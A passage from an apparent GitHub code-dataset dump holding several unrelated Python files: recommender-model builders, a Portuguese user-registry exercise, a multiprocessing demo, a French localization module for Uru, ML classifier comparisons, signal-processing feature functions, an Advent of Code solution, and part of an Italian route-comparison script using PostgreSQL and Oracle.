hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n def dot_product_func(inputs):\n dot_product = inputs[0]\n for idx in range(1,len(inputs)):\n dot_product*= inputs[idx]\n dot_product = layers.BatchNormalization()(dot_product)\n return dot_product\n\n def matrix_mul_func(inputs):\n matrix_mul = []\n\n # print(inputs)\n # for idx, inp in enumerate(inputs):\n # print(inp)\n # print(tf.expand_dims(inp,1))\n # print(tf.expand_dims(inp,2))\n # print(tf.reshape(tf.expand_dims(inp,1)@tf.expand_dims(inp,2),[-1,1]))\n\n for one in inputs:\n one = tf.expand_dims(one,1)\n for two in inputs:\n two = tf.expand_dims(two,2)\n matrix_mul.append(tf.reshape(one @ two ,[-1,1]))\n matrix_mul = layers.concatenate(matrix_mul)\n\n return matrix_mul\n\n #dot_product = dot_product_func(interaction_inputs)\n #input_top = layers.concatenate([deep, dot_product])\n #deep = input_top\n\n matrix_mul = matrix_mul_func(interaction_inputs)\n deep = matrix_mul\n\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(deep)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_dlrm_parallel_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n embedding_outputs_list = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n embedding_outputs_list.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n cat_embedded_outputs = layers.concatenate(embedding_outputs_list)\n\n interaction_inputs = []\n\n for deep in embedding_outputs_list:\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n def matrix_mul_func(inputs):\n matrix_mul = []\n\n # print(inputs)\n # for idx, inp in enumerate(inputs):\n # print(inp)\n # print(tf.expand_dims(inp,1))\n # print(tf.expand_dims(inp,2))\n # print(tf.reshape(tf.expand_dims(inp,1)@tf.expand_dims(inp,2),[-1,1]))\n\n for one in inputs:\n one = tf.expand_dims(one,1)\n for two in inputs:\n two = tf.expand_dims(two,2)\n matrix_mul.append(tf.reshape(one @ two ,[-1,1]))\n matrix_mul = layers.concatenate(matrix_mul)\n\n return matrix_mul\n\n #dot_product = dot_product_func(interaction_inputs)\n #input_top = layers.concatenate([deep, dot_product])\n #deep = input_top\n\n matrix_mul = matrix_mul_func(interaction_inputs)\n\n inputs = layers.concatenate([num_encoded_inputs,cat_embedded_outputs])\n deep = inputs\n\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([matrix_mul,deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_modified_dlrm_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n interaction_inputs = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n interaction_inputs.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n\n hidden_units_dlrm_bottom = [32,16]\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n # dot_product = [1]*max_embedding_length\n # for input in interaction_inputs:\n # dot_product = np.dot(input, dot_product)\n\n def dot_product_func(inputs):\n dot_product = inputs[0]\n for idx in range(1,len(inputs)):\n dot_product*= inputs[idx]\n return dot_product\n dot_product = dot_product_func(interaction_inputs)\n\n print(dot_product)\n print(deep)\n\n input_top = deep\n for input in interaction_inputs:\n input_top = layers.concatenate([input_top, input])\n deep = input_top\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([deep, dot_product])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_candidate_generator():\n \n inputs = create_model_inputs()\n #print(inputs)\n encoded_inputs = encode_inputs(inputs,\"mean\",True)\n #print(encoded_inputs)\n deep = encoded_inputs\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep) \n #deep = layers.Dense(units=NUM_CLASSES, activation=\"linear\")(deep)\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(deep)\n model = keras.Model(inputs=inputs, outputs=outputs)\n \n return model\n\n\n#wide_and_deep_model = create_wide_and_deep_model()\n#wide_and_cross_model = create_deep_and_cross_model()\n#wide_and_cross_stacked = create_deep_and_cross_model_stacked()\n#dlrm_model = create_dlrm_model()\n#dlrm_parallel_model = create_dlrm_parallel_model()\ncandidate_generator = create_candidate_generator()\n\nrun_experiment(candidate_generator)\n\n","repo_name":"davidGasser/DLRecSys_Movies","sub_path":"candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":28576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10931028967","text":"def perguntar():\n resposta = input(\"O que deseja realizar?\" +\n \" - Para Inserir um usuário\" +\n \"

- Para Pesquisar um usuário\" +\n \" - Para Excluir um usuário\" +\n \" - Para Listar um usuário: \").upper()\n return resposta\n\ndef inserir(dicionario):\n chave=input(\"Digite o login: \").upper()\n dicionario[chave]=[input(\"Digite o nome: \").upper(),\n input(\"Digite a última data de acesso: \"),\n input(\"Qual a última estação acessada: \").upper()]\n\n\ndef pesquisar(dicionario, chave):\n lista=dicionario.get(chave)\n if lista!=None:\n print(\"Nome...........: \" + lista[0])\n print(\"Último acesso..: \" + lista[1])\n print(\"Última estação.: \" + lista[2])\n\ndef excluir(dicionario, chave):\n if dicionario.get(chave)!=None:\n del dicionario[chave]\n print(\"Objeto Eliminado\")\n\ndef listar(dicionario):\n for chave, valor in dicionario.items():\n print(\"Objeto......\")\n print(\"Login: \", chave)\n print(\"Dados: \", valor)\n\n\n#from Capitulo4_Dicionarios.Funcoes import *\nusuarios={}\n\nopcao=perguntar()\nwhile opcao==\"I\" or opcao==\"P\" or opcao==\"E\" or opcao==\"L\":\n if opcao==\"I\":\n inserir(usuarios)\n if opcao==\"P\":\n pesquisar(usuarios,input(\"Qual login deseja pesquisar? \"))\n if opcao == \"E\":\n excluir(usuarios,input(\"Qual login deseja excluir? \"))\n if opcao == \"L\":\n listar(usuarios)\n opcao = perguntar()","repo_name":"StephanyDuarte/CourseFiapON.py","sub_path":"Funçoes.py","file_name":"Funçoes.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74928624800","text":"import multiprocessing\nimport time \n\nstart = time.perf_counter() \n\ndef do_something(seconds):\n print(f'Sleeping {seconds} second(s') \n time.sleep(seconds) \n print('Done sleeping...') \n\n\n\"\"\"\nBelow part is without multiprocessing. \n\"\"\"\n# do_something() \n# do_something()\n\n\n\"\"\"\nBelow part is showing about the multiprocessing example. \n\"\"\"\n# we just need to assign the orginal function, no need to call\n# p1 = multiprocessing.Process(target=do_something)\n# p2 = multiprocessing.Process(target=do_something) \n\n# p1.start() \n# p2.start() \n\n# p1.join() \n# p2.join() \n\nprocesses = []\nfor _ in range(10):\n p = multiprocessing.Process(target=do_something, args=[1.5]) \n p.start() \n processes.append(p) \n\n\nfor process in processes:\n process.join() \n\nfinish = time.perf_counter() \nprint(f'Finish in {round(finish-start, 2)} second(s)')","repo_name":"ujass/crack_the_interview","sub_path":"multi_processing/multi_process.py","file_name":"multi_process.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71221774242","text":"# -*- coding: utf-8 -*-\n#==============================================================================#\n# #\n# This is a patched file that was originally written by Cyan Worlds Inc. #\n# See the file AUTHORS for more info about the contributors of the changes #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #\n# #\n# You may re-use the code in this file within the context of Uru. #\n# #\n#==============================================================================#\nfrom Plasma import *\nfrom PlasmaVaultConstants import *\nxFolderIDToFolderName = {\n PtVaultStandardNodes.kUserDefinedNode: 'D\\xe9fini par l\\'utilisateur',\n PtVaultStandardNodes.kInboxFolder: 'Bo\\xeete de r\\xe9ception',\n PtVaultStandardNodes.kBuddyListFolder: 'Amis',\n PtVaultStandardNodes.kIgnoreListFolder: 'Liste \\xe0 ignorer',\n PtVaultStandardNodes.kPeopleIKnowAboutFolder: 'R\\xe9cents',\n PtVaultStandardNodes.kChronicleFolder: 'Chronique',\n PtVaultStandardNodes.kAvatarOutfitFolder: 'Armoire',\n PtVaultStandardNodes.kAgeTypeJournalFolder: 'Journaux d\\'\\xc2ges',\n PtVaultStandardNodes.kSubAgesFolder: 'Sous-\\xc2ges',\n PtVaultStandardNodes.kHoodMembersFolder: 'Voisins',\n PtVaultStandardNodes.kAllPlayersFolder: 'Tous les joueurs',\n PtVaultStandardNodes.kAgeMembersFolder: 'Joueurs de l\\'\\xc2ge',\n PtVaultStandardNodes.kAgeJournalsFolder: 'Dossiers des journaux d\\'\\xc2ges',\n PtVaultStandardNodes.kCanVisitFolder: 'Visiteurs potentiels',\n PtVaultStandardNodes.kAgeOwnersFolder: 'Propri\\xe9taires',\n PtVaultStandardNodes.kPublicAgesFolder: 'Quartiers publics',\n PtVaultStandardNodes.kAgesIOwnFolder: '\\xc2ges poss\\xe9d\\xe9s',\n PtVaultStandardNodes.kAgesICanVisitFolder: '\\xc2ges visitables',\n PtVaultStandardNodes.kAvatarClosetFolder: 'Armoire \\xe0 avatar'\n}\nxMayorOfNeighborhood = 'Maire'\nxMemberOfNeighborhood = 'Membre'\nxNeighborhoodPrivate = 'priv\\xe9'\nxNeighborhoodPublic = 'public'\nxDateTimeFormat = '%d/%m/%y %H:%M'\nxDateFormat = '%d/%m/%y'\nxImagerMessage = 'De\\xa0: %s\\nObjet\\xa0: %s\\n\\n%s'\nxHoodWelcome = 'Bienvenue \\xe0 %s. Pour plus d\\'informations, rendez-vous dans la salle de classe'\nxDeleteNeighborhoodBook = '\\xcates-vous s\\xfbr(e) de vouloir supprimer ce Livre et ainsi perdre votre inscription dans ce quartier ?'\nxDeleteBook = '\\xcates-vous s\\xfbr(e) de vouloir supprimer ce Livre et ainsi annuler votre progression dans cet \\xc2ge ?'\nxNeighborhood = 'Quartier'\nxTranslatedAgeNames = {\n 'Ferry Terminal': 'Terminal de ferry',\n 'Tokotah Alley': 'All\\xe9e Tokotah',\n 'Palace Alcove': 'Alc\\xf4ve du palais',\n 'Library Courtyard': 'Cour de la biblioth\\xe8que',\n 'Concert Hall Foyer': 'Hall de la salle de concert',\n 'Eder Kemo': 'Eder Kemo',\n 'Eder Gira': 'Eder Gira',\n 'Gahreesen': 'Gahreesen',\n 'Kadish': 'Kadish',\n 'Nexus': 'Nexus',\n 'Neighborhood': 'Quartier',\n 'Relto': 'Relto',\n 'Teledahn': 'Teledahn',\n 'Bevin': 'Bevin',\n 'Kirel': 'Kirel',\n 'Rezeero Observation': 'D\\'ni-Rezeero observation',\n 'Rezeero': 'D\\'ni-Rezeero',\n 'Great Zero': 'D\\'ni-Rezeero'\n}\nxPossesive = 'de'\n\ndef LocalizeAgeName(displayName):\n localizedName = displayName.strip()\n if (localizedName == 'D\\'ni-Rudenna'):\n try:\n sdl = xPsnlVaultSDL()\n if ((sdl['TeledahnPoleState'][0] > 5) or ((sdl['KadishPoleState'][0] > 5) or ((sdl['GardenPoleState'][0] > 5) or (sdl['GarrisonPoleState'][0] > 5)))):\n localizedName = 'D\\'ni-Rudenna'\n else:\n localizedName = '???'\n except:\n localizedName = '???'\n elif (localizedName == 'Ae\\'gura'):\n localizedName = 'D\\'ni-Ae\\'gura'\n elif (localizedName == 'GreatZero'):\n localizedName = 'D\\'ni-Rezeero'\n elif (not (localizedName.startswith('D\\'ni'))):\n if (localizedName[(len(localizedName) - 12):] == 'Neighborhood'):\n localizedName = (localizedName[:(len(localizedName) - 12)] + xNeighborhood)\n return localizedName\n try:\n localizedName = xTranslatedAgeNames[localizedName]\n return localizedName\n except:\n pass\n apostropheLoc = localizedName.rfind(\"'\")\n if (apostropheLoc == -1):\n return localizedName\n if ((apostropheLoc + 3) >= len(localizedName)):\n return localizedName\n if (not (((localizedName[(apostropheLoc + 1)] == 's') and (localizedName[(apostropheLoc + 2)] == ' ')))):\n return localizedName\n userName = localizedName[:apostropheLoc]\n ageName = localizedName[(apostropheLoc + 3):]\n localizedName = ((((ageName + ' ') + xPossesive) + ' ') + userName)\n return localizedName\n\n","repo_name":"Atrion/Offline-Ki","sub_path":"tpots-fixes/xFrench.py","file_name":"xFrench.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42360410622","text":"import os\nimport pandas as pd\nos.chdir(\"/Users/Sarah/Desktop\")\ndf = pd.read_csv(\"blood_markers.csv\")\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import metrics\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import accuracy_score, f1_score, roc_auc_score\nfrom sklearn.metrics import classification_report\n\n#Prepare data\ndf.dropna(inplace=True)\ncsv_read = df[~df['Group'].isin(['analysis error/unclassifiable', 'insuff follow-up'])]\ny = csv_read['Group']\ny = y.replace({'single seizure': 0, 'epilepsy': 1, 'PSE': 1})\nX = csv_read.drop(['Group', 'patient_number'], axis=1)\nX['Gender'] = X['Gender'].replace({'Male': 0, 'Female': 1})\n\n#Split data into train and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state = 42)\n\n#Scale data\nscaler = MinMaxScaler(feature_range=(0, 1))\nX_train_scaled = scaler.fit_transform(X_train)\nX_test_scaled = scaler.transform(X_test)\n\nXGBmodel = XGBClassifier()\nRFmodel = RandomForestClassifier()\nNNmodel = MLPClassifier()\nSVMmodel = SVC()\n\nmodels = [XGBmodel, RFmodel, SVMmodel, NNmodel]\nfor model in models:\n model.fit(X_train_scaled, y_train)\n\naccuracy = [metrics.accuracy_score(y_test, model.predict(X_test_scaled)) for model in models]\nauc_scores = [roc_auc_score(y_test, model.predict(X_test_scaled)) for model in models]\nf1_scores = [f1_score(y_test, model.predict(X_test_scaled)) for model in models]\n\nmax_index = auc_scores.index(max(auc_scores))\nmodel = models[max_index]\nprint(accuracy)\nprint(auc_scores)\nprint(f1_scores)\nprint('Top performing model', model)","repo_name":"Sarah-UU/Master-Thesis","sub_path":"Classification.py","file_name":"Classification.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40571574067","text":"from __future__ import division\nimport numpy as np\nfrom numpy.fft import rfft\nfrom numpy import argmax, mean, diff, log\nfrom scipy.signal import blackmanharris\nfrom scipy.fftpack import fft\n\n\n\nfrom scipy.signal import butter, lfilter, filtfilt\n\nNan = float(\"nan\") # Not-a-number capitalized like None, True, False\nInf = float(\"inf\") # infinite value capitalized ...\n\neps = np.finfo(\"float32\").eps\n\n\ndef mad(a, normalize=True, axis=0):\n \n from scipy.stats import norm\n c = norm.ppf(3/4.) if normalize else 1\n return np.median(np.abs(a - np.median(a)) / c, axis=axis)\n\n\ndef rssq(x):\n return np.sqrt(np.sum(np.abs(x)**2))\n\n\ndef peak2rms(x):\n num = max(abs(x))\n den = rms (x)\n return num/den\n\ndef rms(x):\n return np.sqrt(np.mean(x**2))\n\ndef range_bytes (win): \n return range(win) \n\ndef energy(x):\n energy = np.sum(x**2) / len(x) # axis = 1 is column sum\n return energy\n\ndef zcr_2(frame):\n count = len(frame)\n countZ = np.sum(np.abs(np.diff(np.sign(frame)))) / 2\n return (np.float64(countZ) / np.float64(count-1.0))\n\ndef zcr(x):\n count = (np.diff(np.sign(x)) != 0).sum()\n rate = count/len(x)\n return rate\n \n \n\"\"\" Frequency-domain features \"\"\"\n\ndef peakfreq_from_fft(sig, fs):\n \"\"\"\n Estimate frequency from peak of FFT\n \"\"\"\n # Compute Fourier transform of windowed signal\n windowed = sig * blackmanharris(len(sig))\n f = rfft(windowed)\n\n # Find the peak and interpolate to get a more accurate peak\n i = argmax(abs(f)) - 1 # Just use this for less-accurate, naive version\n true_i = parabolic(log(abs(f)), i)[0]\n\n # Convert to equivalent frequency\n return fs * true_i / len(windowed)\n\ndef parabolic(f, x):\n xv = 1/2 * (f[x-1] - f[x+1]) / (f[x-1] - 2 * f[x] + f[x+1]) + x\n yv = f[x] - 1/4 * (f[x-1] - f[x+1]) * (xv - x)\n return (xv, yv)\n\ndef spectralCentroidAndSpread(x, fs):\n \"\"\"Computes spectral centroid of frame (given abs(FFT))\"\"\"\n \n X = abs(fft(x)) # get fft magnitude\n ind = (np.arange(1, len(X) + 1)) * (fs/(2.0 * len(X)))\n\n Xt = X.copy()\n Xt = Xt / Xt.max()\n NUM = np.sum(ind * Xt)\n DEN = np.sum(Xt) + eps\n\n # Centroid:\n C = (NUM / DEN)\n\n # Spread:\n S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)\n\n # Normalize:\n C = C / (fs / 2.0)\n S = S / (fs / 2.0)\n\n return (C, S)\n\n\n\n\n\ndef spectralRollOff(x, c, fs):\n \"\"\"Computes spectral roll-off\"\"\"\n X = abs(fft(x)) # get fft magnitude\n totalEnergy = np.sum(X ** 2)\n fftLength = len(X)\n Thres = c*totalEnergy\n # Ffind the spectral rolloff as the frequency position \n # where the respective spectral energy is equal to c*totalEnergy\n CumSum = np.cumsum(X ** 2) + eps\n [a, ] = np.nonzero(CumSum > Thres)\n if len(a) > 0:\n mC = np.float64(a[0]) / (float(fftLength))\n else:\n mC = 0.0\n return (mC)\n\n\ndef chromaFeaturesInit(nfft, fs):\n \"\"\"\n This function initializes the chroma matrices used in the calculation of the chroma features\n \"\"\"\n freqs = np.array([((f + 1) * fs) / (2 * nfft) for f in range(nfft)]) \n Cp = 27.50 \n nChroma = np.round(12.0 * np.log2(freqs / Cp)).astype(int)\n\n nFreqsPerChroma = np.zeros((nChroma.shape[0], ))\n\n uChroma = np.unique(nChroma)\n for u in uChroma:\n idx = np.nonzero(nChroma == u)\n nFreqsPerChroma[idx] = idx[0].shape\n \n return nChroma, nFreqsPerChroma\n\n\ndef chromaFeatures(x, fs, nChroma, nFreqsPerChroma):\n \n\n X = abs(fft(x)) # get fft magnitude\n chromaNames = ['A', 'A#', 'B', 'C', 'C#', 'D', \n 'D#', 'E', 'F', 'F#', 'G', 'G#']\n spec = X**2 \n if nChroma.max()nChroma.shape[0])[0][0] \n C = np.zeros((nChroma.shape[0],))\n C[nChroma[0:I-1]] = spec \n C /= nFreqsPerChroma\n finalC = np.zeros((12, 1))\n newD = int(np.ceil(C.shape[0] / 12.0) * 12)\n C2 = np.zeros((newD, ))\n C2[0:C.shape[0]] = C\n C2 = C2.reshape(int(C2.shape[0]/12), 12)\n #for i in range(12):\n # finalC[i] = np.sum(C[i:C.shape[0]:12])\n finalC = np.matrix(np.sum(C2, axis=0)).T\n finalC /= spec.sum()\n\n\n return chromaNames, finalC\n\ndef recursive_sta_lta(a, nsta, nlta):\n\n \"\"\"\n\n Recursive STA/LTA written in Python.\n\n .. note::\n\n There exists a faster version of this trigger wrapped in C\n\n called :func:`~obspy.signal.trigger.recursive_sta_lta` in this module!\n\n :type a: NumPy :class:`~numpy.ndarray`\n\n :param a: Seismic Trace\n\n :type nsta: int\n\n :param nsta: Length of short time average window in samples\n\n :type nlta: int\n\n :param nlta: Length of long time average window in samples\n\n :rtype: NumPy :class:`~numpy.ndarray`\n\n :return: Characteristic function of recursive STA/LTA\n\n .. seealso:: [Withers1998]_ (p. 98) and [Trnkoczy2012]_\n\n \"\"\"\n\n try:\n\n a = a.tolist()\n\n except Exception:\n\n pass\n\n ndat = len(a)\n\n # compute the short time average (STA) and long time average (LTA)\n\n # given by Evans and Allen\n\n csta = 1. / nsta\n\n clta = 1. / nlta\n\n sta = 0.\n\n lta = 1e-99 # avoid zero division\n\n charfct = [0.0] * len(a)\n\n icsta = 1 - csta\n\n iclta = 1 - clta\n\n for i in range(1, ndat):\n\n sq = a[i] ** 2\n\n sta = csta * sq + icsta * sta\n\n lta = clta * sq + iclta * lta\n\n charfct[i] = sta / lta\n\n if i < nlta:\n\n charfct[i] = 0.\n\n return np.array(charfct)","repo_name":"huazhz/ml4ms","sub_path":"utils/sigproc.py","file_name":"sigproc.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"20970743680","text":"with open('i4.txt') as f:\n data = f.readlines()\ndata = [d.strip().split('-') for d in data]\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nvalid = 0\nfor room in data:\n char_count = {}\n name = ''.join(room[:-1])\n name2 = ' '.join(room[:-1])\n unique_chars = set(name)\n for char in unique_chars:\n char_count[char] = name.count(char)\n char_count = ''.join([k for k, v in sorted(char_count.items(), key=lambda item: (-item[1], item[0]))][:5])\n checksum = room[-1].split('[')[1][:-1]\n id_num = int(room[-1].split('[')[0])\n if checksum == char_count:\n valid += id_num\n shift = id_num % 26\n name3 = ''\n for n in name2:\n if n == ' ':\n name3 = name3 + ' '\n elif shift + alphabet.index(n) >= 25:\n i = shift + alphabet.index(n) - 25\n name3 = name3 + alphabet[i-1]\n else:\n i = shift + alphabet.index(n)\n name3 = name3 + alphabet[i]\n print(f'{name3}, {id_num}')","repo_name":"JamesCaddick/aoc","sub_path":"2016/c4.py","file_name":"c4.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3407943564","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# AMIU copyleft 2021\n# Roberto Marzocchi\n\n'''\nLo script verifica le variazioni e manda CSV a assterritorio@amiu.genova.it giornalmemte con la sintesi delle stesse \n'''\n\nimport os, sys, re # ,shutil,glob\nimport inspect, os.path\n\nimport xlsxwriter\n\n\n#import getopt # per gestire gli input\n\n#import pymssql\n\nimport psycopg2\n\nimport cx_Oracle\n\nimport datetime\nimport holidays\nfrom workalendar.europe import Italy\n\n\nfrom credenziali import db, port, user, pwd, host, user_mail, pwd_mail, port_mail, smtp_mail\n\n\n#import requests\n\nimport logging\nimport email, smtplib, ssl\nimport mimetypes\nfrom email.mime.multipart import MIMEMultipart\nfrom email import encoders\nfrom email.message import Message\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nfrom invio_messaggio import *\n\n\nfrom crea_dizionario_da_query import *\n\n\nimport csv\n\n#LOG\n\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\npath = os.path.dirname(os.path.abspath(filename))\n\n'''#path=os.path.dirname(sys.argv[0]) \n#tmpfolder=tempfile.gettempdir() # get the current temporary directory\nlogfile='{}/log/variazioni_importazioni.log'.format(path)\n#if os.path.exists(logfile):\n# os.remove(logfile)\n\nlogging.basicConfig(format='%(asctime)s\\t%(levelname)s\\t%(message)s',\n filemode='a', # overwrite or append\n filename=logfile,\n level=logging.DEBUG)\n'''\n\n\npath=os.path.dirname(sys.argv[0]) \n#tmpfolder=tempfile.gettempdir() # get the current temporary directory\nlogfile='{}/log/variazioni_importazioni.log'.format(path)\nerrorfile='{}/log/error_variazioni_importazioni.log'.format(path)\n#if os.path.exists(logfile):\n# os.remove(logfile)\n\n\n\n\n\n\n\n# Create a custom logger\nlogging.basicConfig(\n level=logging.DEBUG,\n handlers=[\n ]\n)\n\nlogger = logging.getLogger()\n\n# Create handlers\nc_handler = logging.FileHandler(filename=errorfile, encoding='utf-8', mode='w')\nf_handler = logging.StreamHandler()\n#f_handler = logging.FileHandler(filename=logfile, encoding='utf-8', mode='w')\n\n\nc_handler.setLevel(logging.ERROR)\nf_handler.setLevel(logging.DEBUG)\n\n\n# Add handlers to the logger\nlogger.addHandler(c_handler)\nlogger.addHandler(f_handler)\n\n\ncc_format = logging.Formatter('%(asctime)s\\t%(levelname)s\\t%(message)s')\n\nc_handler.setFormatter(cc_format)\nf_handler.setFormatter(cc_format)\n\n\ndef cfr_tappe(tappe_sit, tappe_uo, logger):\n ''' Effettua il confronto fra le tappe di SIT e quelle di UO'''\n #logger.info('Richiamo la funzione cfr_tappe')\n check=0\n if len(tappe_sit) == len(tappe_uo) :\n k=0\n while k < len(tappe_sit):\n #logger.debug(tappe_sit[k][0])\n #logger.debug(tappe_uo[k][0])\n \n # nume_seq 0\n if tappe_sit[k][0]!=tappe_uo[k][0]:\n check=1\n # id_via 1\n if tappe_sit[k][1]!=tappe_uo[k][1]:\n check=1 \n # riferimento 3\n if (tappe_uo[k][3] is None and tappe_sit[k][3] is None) or ( (not tappe_uo[k][3] or re.search(\"^\\s*$\", tappe_uo[k][3])) and (not tappe_sit[k][3] or re.search(\"^\\s*$\", tappe_sit[k][3])) ):\n check1=0\n else:\n if tappe_sit[k][3]!=tappe_uo[k][3]:\n check=1\n logger.warning('rif SIT = .{}., rif UO = {}'.format(tappe_sit[k][3], tappe_uo[k][3]))\n \n \n # frequenza 4\n if tappe_sit[k][4]!=tappe_uo[k][4]:\n check=1 \n # tipo_el 5\n if tappe_sit[k][5]!=tappe_uo[k][5]:\n check=1 \n #id_el 6\n if tappe_sit[k][6]!=tappe_uo[k][6]:\n check=1 \n # nota via 7\n #logger.debug('SIT = {}, UO = {}'.format(tappe_sit[k][7], tappe_uo[k][7]))\n if (tappe_uo[k][7] is None and tappe_sit[k][7] is None) or ( (not tappe_uo[k][7] or re.search(\"^\\s*$\", tappe_uo[k][7])) and (not tappe_sit[k][7] or re.search(\"^\\s*$\", tappe_sit[k][7])) ):\n check1=0\n \n else:\n if tappe_sit[k][7].strip()!=tappe_uo[k][7].strip():\n check=1\n logger.warning('SIT = {}, UO = {}'.format(tappe_sit[k][7], tappe_uo[k][7]))\n \n k+=1\n else:\n check=1\n return check\n\n\n\n\n\n\ndef main():\n # carico i mezzi sul DB PostgreSQL\n logger.info('Connessione al db')\n conn = psycopg2.connect(dbname=db,\n port=port,\n user=user,\n password=pwd,\n host=host)\n\n curr = conn.cursor()\n #conn.autocommit = True\n\n\n id_p= 155762\n cod_p= '0213244201'\n oggi1='21/11/2022'\n \n # Mi connetto al DB oracle UO\n cx_Oracle.init_oracle_client(percorso_oracle) # necessario configurare il client oracle correttamente\n #cx_Oracle.init_oracle_client() # necessario configurare il client oracle correttamente\n parametri_con='{}/{}@//{}:{}/{}'.format(user_uo,pwd_uo, host_uo,port_uo,service_uo)\n logger.debug(parametri_con)\n con = cx_Oracle.connect(parametri_con)\n logger.info(\"Versione ORACLE: {}\".format(con.version))\n \n \n # PRIMA VERIFICO SE CI SIANO DIFFERENZE CHE GIUSTIFICHINO IMPORTAZIONE\n curr1 = conn.cursor()\n sel_sit='''select vt.num_seq, id_via::int, coalesce(vt.numero_civico, ' ') as numero_civico , \n coalesce(riferimento,' ') as riferimento, fo.freq_binaria as frequenza,vt.tipo_elemento, vt.id_elemento::int,\n coalesce(vt.nota_asta, ' ') as nota_asta\n from etl.v_tappe vt \n join etl.frequenze_ok fo on fo.cod_frequenza = vt.frequenza_asta::int \n where id_percorso = %s \n order by num_seq , numero_civico, id_elemento, nota_asta '''\n try:\n curr1.execute(sel_sit, (id_p,))\n #logger.debug(query_sit1, max_id_macro_tappa, vv[4] )\n #curr1.rowfactory = makeDictFactory(curr1)\n tappe_sit=curr1.fetchall()\n except Exception as e:\n logger.error(sel_sit, id_p )\n logger.error(e)\n \n \n cur1 = con.cursor()\n sel_uo='''SELECT VTP.CRONOLOGIA NUM_SEQ,VTP.ID_VIA, NVL(VTP.NUM_CIVICO,' ') as NUMERO_CIVICO,\n NVL(VTP.RIFERIMENTO, ' ') as RIFERIMENTO,\n VTP.FREQELEM,VTP.TIPO_ELEMENTO, 